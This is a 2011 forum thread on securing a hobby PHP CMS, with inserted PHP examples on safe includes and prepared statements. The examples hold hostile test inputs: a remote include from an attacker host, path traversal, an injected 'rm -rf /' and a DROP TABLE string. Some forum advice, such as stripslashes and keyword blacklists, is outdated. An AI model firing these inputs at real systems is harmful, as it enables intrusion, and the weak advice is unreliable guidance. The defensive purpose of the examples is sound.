CMS Security


2 replies to this topic

#1 DaCh

DaCh

    elite

  • Members
  • 106 posts
  • Location:Denmark

Posted 02 February 2011 - 07:22 PM

Hey all.

I'm working on my own CMS for fun, and now I am thinking about the security of it.

Does anyone know how to find the most well-known security holes in PHP and SQL sites?

Or anything else I can do to make it better?

Sorry for my noob question, but I really learn by doing it.
And thanks for your time.

#2 Trikk

Trikk

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 348 posts
  • Country:
  • Gender:Male
  • Location:Portland, OR

Posted 03 February 2011 - 07:25 AM

Well, first off, NEVER trust user input.

When inserting records into a MySQL database, always sanitize the input by using mysql_real_escape_string (http://php.net/manua...cape-string.php).

Also, when using $_POST[] or $_GET[], you need to sanitize that input as well by using stripslashes or similar.

Incorporating this into any code you write will help you tremendously.

Another thing is, since you are building a CMS, apart from just password protecting the admin page, be sure to use an .htaccess file. The .htaccess should only allow access from certain IPs you own.

Example of .htaccess:
AuthUserFile /home/test/.htpasswd
AuthGroupFile /dev/null
AuthName "Administrative Portal"
AuthType Basic

<limit GET>
satisfy any
order deny,allow
deny from all
allow from 127.0.0.1
allow from 221.23.249.294
require valid-user
</limit>

You must place this .htaccess in the directory of your CMS admin page. This will only allow the IPs listed to access your admin page.

Another thing: when you include files, don't do something like the following:

<?php
include($includedir."/config.php");
?>

If your PHP configuration is not set up properly, someone can do an include on your website and use a PHP shell to take over your website as well as your server.


These are the basics, I hope it helps. If anyone has anything else to add, please do.
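
The include problem above, as an added example that is not code from the original post: a CMS page loader that builds an include path from request data, beside a hardened version. The request parameters ($_GET['dir'], $_GET['page']), the "pages" directory and the function names are illustrative assumptions.

```php
<?php
// Added example (not from the original post). Names, directories and
// request parameters are assumptions chosen for illustration.

// --- Vulnerable pattern --------------------------------------------------
// The prefix of the include path comes from the request. Depending on the
// PHP configuration an attacker gets:
//   ?dir=../../../../some/dir         -> local file inclusion of an arbitrary
//                                        path ending in /config.php
//   ?dir=http://attacker.example/x    -> remote include of attacker code if
//                                        allow_url_include=On
function loadConfigUnsafe(array $get): void
{
    $includedir = $get['dir'] ?? 'pages';
    include($includedir . "/config.php");   // attacker controls the prefix
}

// --- Hardened pattern ----------------------------------------------------
// The base directory is fixed in code, the page name is a strict slug, the
// canonical path is checked to stay inside the base directory, and anything
// else fails closed. Keep allow_url_include=Off (the default) and consider
// open_basedir as a second layer in php.ini.
const PAGE_BASE = __DIR__ . '/pages';

function resolvePagePath(string $page): ?string
{
    // Slug only: no slashes, dots, NUL bytes or URL schemes can get through.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $page)) {
        return null;
    }
    $base = realpath(PAGE_BASE);
    $real = realpath(PAGE_BASE . '/' . $page . '.php');
    if ($base === false || $real === false) {
        return null;  // base directory missing or page file does not exist
    }
    // Defence in depth: the resolved file must sit directly under PAGE_BASE,
    // which also catches symlinks that point outside it.
    if (dirname($real) !== $base) {
        return null;
    }
    return $real;
}

function loadPageSafe(array $get): void
{
    $requested = $get['page'] ?? 'home';
    $path = is_string($requested) ? resolvePagePath($requested) : null;
    if ($path === null) {
        http_response_code(404);      // fail closed instead of a fallback include
        echo "No such page\n";
        return;
    }
    include $path;
}

// Demonstration on constructed probe inputs. No page files need to exist for
// the rejections; an unknown but well-formed slug is rejected as well.
$probes = [
    '../../etc/passwd',
    'http://attacker.example/shell',
    "home\0",
    'home; rm -rf /',
    'missing-page',
];
foreach ($probes as $probe) {
    printf("%-32s => %s\n", addcslashes($probe, "\0"),
        resolvePagePath($probe) === null ? 'rejected' : 'allowed');
}
```

The slug check alone already blocks every probe above; the realpath() comparison is kept so that a later refactor of the pattern (for instance allowing subdirectories) cannot silently reopen the traversal.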

#3 heisenbug

heisenbug

    Gibson Hacker

  • Members
  • 79 posts
  • Country:
  • Gender:Male

Posted 06 February 2011 - 01:52 AM

If only a few people you know are going to be using this, then create a certificate and require the browser to have it.

You might want to protect yourself from SQL injections. Stripping out semicolons is important. Also less-than, greater-than, equals signs, etc. And if it doesn't need to be in there, INSERT, DELETE, DROP, UPDATE, etc. (No one should have a first name, age, etc. of DROP or UPDATE.)

Use dropdown menus, check-boxes, radio buttons, etc. whenever possible. The option they pick better damn well be one of the choices you gave them. If it isn't, then I would just log their IP and exit out of the script.
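
The SQL injection and dropdown advice in the replies above, as an added example that is not code from either post: a form handler that checks a submitted choice against the options the form offered, validates an integer field, and writes the record with a prepared statement so that a name containing quotes, semicolons or the word DROP is stored literally instead of being stripped. The table, column and function names are illustrative assumptions; the SQLite in-memory database and the sample submissions are constructed for the demonstration.

```php
<?php
// Added example (not from the original posts). Table/column names, handler
// names and the sample submissions are assumptions for illustration.

// Escaping approach mentioned in the thread, shown for contrast. It is only
// correct if the connection charset has been set and the escaped value is
// placed inside quotes; it needs a live MySQL connection and is not run here.
function insertWithEscaping(mysqli $db, string $name, int $age): bool
{
    $safeName = $db->real_escape_string($name);
    return $db->query("INSERT INTO users (name, age) VALUES ('{$safeName}', {$age})") !== false;
}

// Preferred approach: a prepared statement. The values never become part of
// the SQL text, so nothing has to be stripped from them.
function insertWithPreparedStatement(PDO $pdo, string $name, int $age, string $role): bool
{
    $stmt = $pdo->prepare('INSERT INTO users (name, age, role) VALUES (:name, :age, :role)');
    $stmt->bindValue(':name', $name, PDO::PARAM_STR);
    $stmt->bindValue(':age', $age, PDO::PARAM_INT);
    $stmt->bindValue(':role', $role, PDO::PARAM_STR);
    return $stmt->execute();
}

// Server-side check for a dropdown/radio field: the browser does not enforce
// the option list, so the submitted value must be re-checked against it.
const ROLE_OPTIONS = ['reader', 'author', 'editor'];

function validateRole($submitted): ?string
{
    // Strict comparison: "0", integers and arrays all fail the check.
    if (!is_string($submitted) || !in_array($submitted, ROLE_OPTIONS, true)) {
        return null;
    }
    return $submitted;
}

function validateAge($submitted): ?int
{
    $age = filter_var($submitted, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 150]]);
    return $age === false ? null : $age;
}

function handleSignup(PDO $pdo, array $post): string
{
    $role = validateRole($post['role'] ?? null);
    $age  = validateAge($post['age'] ?? null);
    $name = $post['name'] ?? '';
    if ($role === null || $age === null || !is_string($name) || $name === '' || strlen($name) > 64) {
        // Log the source address and stop, as the thread suggests.
        error_log('rejected signup from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
        http_response_code(400);
        return 'invalid input';
    }
    return insertWithPreparedStatement($pdo, $name, $age, $role) ? 'ok' : 'db error';
}

// Offline demonstration with an in-memory SQLite database (constructed data).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (name TEXT, age INTEGER, role TEXT)');

$attempts = [
    ['name' => "Robert'); DROP TABLE users; --", 'age' => '33', 'role' => 'author'], // hostile name
    ['name' => 'Eve', 'age' => '33', 'role' => 'admin'],                              // role not offered
    ['name' => 'Mallory', 'age' => '-1', 'role' => 'reader'],                         // age out of range
];
foreach ($attempts as $post) {
    echo handleSignup($pdo, $post), "\n";
}
echo 'rows stored: ', $pdo->query('SELECT COUNT(*) FROM users')->fetchColumn(), "\n";
echo 'stored name: ', $pdo->query('SELECT name FROM users')->fetchColumn(), "\n";
```

Run it with the pdo_sqlite extension enabled; the users table survives the hostile name because the name is bound as data, and the two malformed submissions are refused before any query is built.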




BinRev is hosted by the great people at Lunarpages!